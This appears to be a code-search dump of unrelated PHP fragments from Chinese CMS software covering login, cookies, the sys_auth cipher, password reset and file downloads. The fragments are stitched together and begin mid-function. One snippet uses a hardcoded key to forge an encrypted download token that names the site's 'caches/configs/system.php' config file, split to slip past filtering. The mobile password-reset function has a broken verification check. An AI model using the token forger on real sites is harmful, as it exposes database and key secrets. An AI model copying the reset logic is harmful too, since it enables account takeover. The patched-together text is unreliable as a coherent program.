getlevel($row->jinyan); if ($level > $row->level) { $updata['level'] = $level; //发送等级通知 $add['uida'] = $row->id; $add['uidb'] = 0; $add['name'] = '用户等级升级通知'; $add['neir'] = '恭喜您,您的用户等级升级到Lv' . $level; $add['addtime'] = time(); $this->CsdjDB->get_insert('msg', $add); } //修改登录时间 $updata['zx'] = 1; $updata['lognum'] = $row->lognum + 1; $updata['logtime'] = time(); $updata['logip'] = getip(); $updata['logms'] = time(); $this->CsdjDB->get_update('user', $user_id, $updata); //登录日志 if (date("Y-m-d", $row->logtime) != date('Y-m-d')) { $this->load->library('user_agent'); $agent = ($this->agent->is_mobile() ? $this->agent->mobile() : $this->agent->platform()) . ' / ' . $this->agent->browser() . ' v' . $this->agent->version(); $add['uid'] = $row->id; $add['loginip'] = getip(); $add['logintime'] = time(); $add['useragent'] = $agent; $this->CsdjDB->get_insert('user_log', $add); } $_SESSION['cscms__id'] = $row->id; $_SESSION['cscms__name'] = $row->name; $_SESSION['cscms__login'] = md5($row->name . $row->pass); $login = TRUE; } } } } else { $row = $this->db->query("SELECT id,name,pass,level,jinyan FROM " . CS_SqlPrefix . "user where id='{$id}'")->row(); if ($row) { if (md5($row->name . $row->pass) == $logstr) { $login = TRUE; //判断等级 $level = getlevel($row->jinyan); if ($level > $row->level) { $updata['level'] = $level; //发送等级通知 $add['uida'] = $row->id; $add['uidb'] = 0; $add['name'] = '用户等级升级通知'; $add['neir'] = '恭喜您,您的用户等级升级到Lv' . $level; $add['addtime'] = time(); $this->CsdjDB->get_insert('msg', $add); } //改变在线秒数 $updata['zx'] = 1; $updata['logms'] = time(); $this->CsdjDB->get_update('user', $id, $updata); } } } if (!$login) { //清除非法登录 unset($_SESSION['cscms__id'], $_SESSION['cscms__name'], $_SESSION['cscms__login']); //清除记住登录 $this->cookie->set_cookie("user_id"); $this->cookie->set_cookie("user_login"); if ($cid == 0) { msg_url('您还没有登录或者登录已超时~!', userurl(site_url('user/login'))); } } else { //判断每天会员要删除的数据 $day = @file_get_contents(FCPATH . "cache/cscms_time/day.txt"); if (date('d') != $day) { //清空每天分享,发布 $uedit['addhits'] = 0; $this->CsdjDB->get_update('user', $_SESSION['cscms__id'], $uedit); write_file(FCPATH . "cache/cscms_time/day.txt", date('d')); } } return $login; }
/** * Cookie 设置、获取、删除 * * @author liu21st <*****@*****.**> * @lastmodify 2013-01-22 16:49:32 by mrmsl * * @param string $name 名称 * @param string $value 值。默认'' * @param array $option 参数设置。默认null * * @return mixed */ function cookie($name, $value = '', $option = null) { $config = array('prefix' => COOKIE_PREFIX, 'expire' => COOKIE_EXPIRE, 'path' => COOKIE_PATH, 'domain' => COOKIE_DOMAIN); if (!empty($option)) { //参数设置(会覆盖黙认设置) if (is_numeric($option)) { $option = array('expire' => $option); } elseif (is_string($option)) { parse_str($option, $option); } $config = array_merge($config, array_change_key_case($option)); } if (is_null($name)) { //清除指定前缀的所有cookie if (empty($_COOKIE)) { return; } //要删除的cookie前缀,不指定则删除config设置的指定前缀 $prefix = empty($value) ? $config['prefix'] : $value; if (!empty($prefix)) { //如果前缀为空字符串将不作处理直接返回 foreach ($_COOKIE as $key => $val) { if (0 === stripos($key, $prefix)) { setcookie($key, '', time() - 3600, $config['path'], $config['domain']); unset($_COOKIE[$key]); } } } return; } $name = $config['prefix'] . $name; if ('' === $value) { return isset($_COOKIE[$name]) ? sys_auth($_COOKIE[$name], false) : null; //获取指定Cookie } else { if (is_null($value)) { //删除cookie setcookie($name, '', time() - 3600, $config['path'], $config['domain']); unset($_COOKIE[$name]); //删除指定cookie } else { //设置cookie $expire = !empty($config['expire']) ? time() + intval($config['expire']) : 0; setcookie($name, sys_auth($value), $expire, $config['path'], $config['domain']); $_COOKIE[$name] = $value; } } }
public function check_status() { $appid = isset($_GET['appid']) && intval($_GET['appid']) ? intval($_GET['appid']) : exit('0'); $applist = getcache('applist'); if(empty($applist)) { /*写入应用列表缓存*/ $applist = $this->db->listinfo('', '', 1, 100, 'appid'); setcache('applist', $applist); } if (!empty($applist)) { $param = sys_auth('action=check_status', 'ENCODE', $applist[$appid]['authkey']); //如果填写ip则通信地址为ip地址,此时绑定了多个虚拟主机有可能出现错误 $appurl = !empty($applist[$appid]['ip']) ? 'http://'.$applist[$appid]['ip'].'/api/' : $applist[$appid]['url']; $url = $appurl.$applist[$appid]['apifilename']; if (strpos($url, '?')) { $url .= '&'; } else { $url .= "?"; } if ($data = @file_get_contents($url.'code='.urlencode($param))) { exit($data); } else { exit('0'); } } else { exit('0'); } }
<?php function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) { $key_length = 4; $key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key')); $fixedkey = md5($key); $egiskeys = md5(substr($fixedkey, 16, 16)); $runtokey = $key_length ? $operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length) : ''; $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16)); $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length)); $i = 0; $result = ''; $string_length = strlen($string); for ($i = 0; $i < $string_length; $i++) { $result .= chr(ord($string[$i]) ^ ord($keys[$i % 32])); } if ($operation == 'ENCODE') { return $runtokey . str_replace('=', '', base64_encode($result)); } else { if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $egiskeys), 0, 16)) { return substr($result, 26); } else { return ''; } } } echo sys_auth('i=3&d=1&t=9999999999&ip=115.238.245.179&m=3&modelid=3&s=caches/configs/system.p&f=hp', 'ENCODE', '8fafb9a1932b309d809e6140772c661');
} //执行本系统登陆操作 $userid = $userinfo['userid']; $groupid = $userinfo['groupid']; $username = $userinfo['username']; $password = $userinfo['password']; $nickname = $userinfo['nickname']; $db->update(array('lastip' => ip(), 'lastdate' => SYS_TIME), array('userid' => $userid)); pc_base::load_sys_class('param', '', 0); if (!$cookietime) { $get_cookietime = param::get_cookie('cookietime'); } $_cookietime = $cookietime ? intval($cookietime) : ($get_cookietime ? $get_cookietime : 0); $cookietime = $_cookietime ? TIME + $_cookietime : 0; $phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key') . $_SERVER['HTTP_USER_AGENT']); $phpcms_auth = sys_auth($userid . "\t" . $password, 'ENCODE', $phpcms_auth_key); header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); param::set_cookie('auth', $phpcms_auth, $cookietime); param::set_cookie('_userid', $userid, $cookietime); param::set_cookie('_username', $username, $cookietime); param::set_cookie('_nickname', $nickname, $cookietime); param::set_cookie('_groupid', $groupid, $cookietime); param::set_cookie('cookietime', $_cookietime, $cookietime); exit('1'); } /** * 同步退出 */ if ($action == 'synlogout') { header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"'); pc_base::load_sys_class('param', '', 0);
/** * 获取通过 set_cookie 设置的 cookie 变量 * @param string $var 变量名 * @param string $default 默认值 * @return mixed 成功则返回cookie 值,否则返回 false */ public static function get_cookie($var, $default = '') { $var = pc_base::load_config('system', 'cookie_pre') . $var; return isset($_COOKIE[$var]) ? sys_auth($_COOKIE[$var], 'DECODE') : $default; }
/** * 手机短信方式找回密码 */ public function public_forget_password_mobile() { $email_config = getcache('common', 'commons'); $this->_session_start(); $member_setting = getcache('member_setting'); if (isset($_POST['dosubmit'])) { //处理提交申请,以手机号为准 if ($_SESSION['code'] != strtolower($_POST['code'])) { showmessage(L('code_error'), HTTP_REFERER); } $mobile = $_POST['mobile']; $mobile_verify = intval($_POST['mobile_verify']); $password = $_POST['password']; $pwdconfirm = $_POST['pwdconfirm']; if ($password != $pwdconfirm) { showmessage(L('passwords_not_match'), HTTP_REFERER); } //验证手机号和传递的验证码是否匹配 $sms_report_db = pc_base::load_model('sms_report_model'); $sms_report_array = $sms_report_db->get_one(array("mobile" > $mobile, 'in_code' => $mobile_verify)); if (empty($sms_report_array)) { showmessage("手机和验证码不对应,请通过正常渠道修改密码!", HTTP_REFERER); } //更新密码 $updateinfo = array(); $updateinfo['password'] = $password; $this->db->update($updateinfo, array('userid' => $this->memberinfo['userid'])); if (pc_base::load_config('system', 'phpsso')) { //初始化phpsso $this->_init_phpsso(); $res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']); } $memberinfo = $this->db->get_one(array('email' => $_POST['email'])); if (!empty($memberinfo['email'])) { $email = $memberinfo['email']; } else { showmessage(L('email_error'), HTTP_REFERER); } pc_base::load_sys_func('mail'); $phpcms_auth_key = md5(pc_base::load_config('system', 'auth_key') . $this->http_user_agent); $code = sys_auth($memberinfo['userid'] . "\t" . SYS_TIME, 'ENCODE', $phpcms_auth_key); $url = APP_PATH . "index.php?m=member&c=index&a=public_forget_password&code={$code}"; $message = $member_setting['forgetpassword']; $message = str_replace(array('{click}', '{url}'), array('<a href="' . $url . '">' . L('please_click') . '</a>', $url), $message); //获取站点名称 $sitelist = getcache('sitelist', 'commons'); if (isset($sitelist[$memberinfo['siteid']]['name'])) { $sitename = $sitelist[$memberinfo['siteid']]['name']; } else { $sitename = 'PHPCMS_V9_MAIL'; } sendmail($email, L('forgetpassword'), $message, '', '', $sitename); showmessage(L('operation_success'), 'index.php?m=member&c=index&a=login'); } else { $siteid = isset($_REQUEST['siteid']) && trim($_REQUEST['siteid']) ? intval($_REQUEST['siteid']) : 1; $siteinfo = siteinfo($siteid); include template('member', 'forget_password_mobile'); } }
function downfiles($field, $value) { extract(string2array($this->fields[$field]['setting'])); $list_str = array(); $file_list = string2array($value); if (is_array($file_list)) { foreach ($file_list as $_k => $_v) { if ($_v[fileurl]) { $filename = $_v[filename] ? $_v[filename] : L('click_to_down'); if ($downloadlink) { $a_k = urlencode(sys_auth("i={$this->id}&s=&m=1&f={$_v['fileurl']}&d={$downloadtype}&modelid={$this->modelid}&catid={$this->catid}", 'ENCODE', pc_base::load_config('system', 'auth_key'))); $list_str[] = "<a href='" . APP_PATH . "index.php?m=content&c=down&a_k={$a_k}' target='_blank'>{$filename}</a>"; } else { $list_str[] = "<a href='{$_v[fileurl]}' target='_blank'>{$filename}</a>"; } } } } return $list_str; }
private function get_admin_manage_code() { $pc_auth_key = md5(pc_base::load_config('system', 'auth_key') . 'adminuser'); $code = sys_auth("adminuser_" . $_GET[pc_hash] . "_" . time(), 'ENCODE', $pc_auth_key); return $code; }
/** * 文本转换为图片 * @param string $txt 图形化文本内容 * @param int $fonttype 无外部字体时生成文字大小,取值范围1-5 * @param int $fontsize 引入外部字体时,字体大小 * @param string $font 字体名称 字体请放于phpcms\libs\data\font下 * @param string $fontcolor 字体颜色 十六进制形式 如FFFFFF,FF0000 */ function string2img($txt, $fonttype = 5, $fontsize = 16, $font = '', $fontcolor = 'FF0000', $transparent = '1') { if (empty($txt)) { return false; } if (function_exists("imagepng")) { $txt = urlencode(sys_auth($txt)); $txt = '<img src="' . APP_PATH . 'api.php?op=creatimg&txt=' . $txt . '&fonttype=' . $fonttype . '&fontsize=' . $fontsize . '&font=' . $font . '&fontcolor=' . $fontcolor . '&transparent=' . $transparent . '" align="absmiddle">'; } return $txt; }
<?php defined('IN_PHPCMS') or exit('No permission resources.'); $txt = trim($_GET['txt']); if (extension_loaded('gd') && $txt) { header("Content-type: image/png"); $txt = urldecode(sys_auth($txt, 'DECODE')); $fontsize = isset($_GET['fontsize']) ? intval($_GET['fontsize']) : 16; $fontpath = PC_PATH . 'libs' . DIRECTORY_SEPARATOR . 'data' . DIRECTORY_SEPARATOR . 'font' . DIRECTORY_SEPARATOR; $fontfile = isset($_GET['font']) && !empty($_GET['font']) ? $fontpath . trim($_GET['font']) : $fontpath . 'georgia.ttf'; $fontcolor = isset($_GET['fontcolor']) && !empty($_GET['fontcolor']) ? trim($_GET['fontcolor']) : 'FF0000'; $fontcolor_r = hexdec(substr($fontcolor, 0, 2)); $fontcolor_g = hexdec(substr($fontcolor, 2, 2)); $fontcolor_b = hexdec(substr($fontcolor, 4, 2)); if (file_exists($fontfile)) { //计算文本写入后的宽度,右下角 X 位置-左下角 X 位置 $image_info = imagettfbbox($fontsize, 0, $fontfile, $txt); $imageX = $image_info[2] - $image_info[0] + 10; $imageY = $image_info[1] - $image_info[7] + 5; //print_r($image_info); $im = @imagecreatetruecolor($imageX, $imageY) or die("Cannot Initialize new GD image stream"); $white = imagecolorallocate($im, 255, 255, 255); $font_color = imagecolorallocate($im, $fontcolor_r, $fontcolor_g, $fontcolor_b); imagecolortransparent($im, $white); //背景透明 imagefilledrectangle($im, 0, 0, $imageX, $imageY, $white); $txt = iconv(CHARSET, "UTF-8", $txt); imagettftext($im, $fontsize, 0, 5, $imageY - 5, $font_color, $fontfile, $txt); } else { $imageX = strlen($txt) * 9; $im = @imagecreate($imageX, 16) or die("Cannot Initialize new GD image stream");